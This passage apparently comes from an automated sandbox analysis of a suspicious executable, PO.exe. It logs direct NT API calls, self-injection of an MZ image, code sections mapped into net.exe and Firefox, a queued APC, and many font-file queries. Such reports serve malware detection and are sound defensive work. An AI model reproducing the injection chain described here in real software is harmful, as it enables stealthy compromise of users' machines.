                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory written: C:\Users\user\Desktop\PO.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 3260Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Users\user\Desktop\PO.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
